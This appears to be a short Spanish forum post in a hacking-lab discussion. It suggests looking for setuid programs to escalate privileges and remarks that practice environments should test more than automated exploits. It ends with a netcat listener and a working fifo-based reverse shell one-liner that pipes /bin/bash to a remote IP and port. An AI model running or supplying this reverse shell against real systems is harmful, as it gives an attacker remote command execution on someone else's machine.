¿¿¿Has mirado los scripts o programas con el setuid a 1??? Si yo pusiese un entorno para aprender pondria cosas que reflejasen que la gente sabe algo más que simplemente probar exploits ya trillados y automatizados. Pero bueno, es solo un punto de vista.
nc -l -p PUERTO
mkfifo /tmp/lalala; nc IP PUERTO < /tmp/lalala | /bin/bash > /tmp/lalala;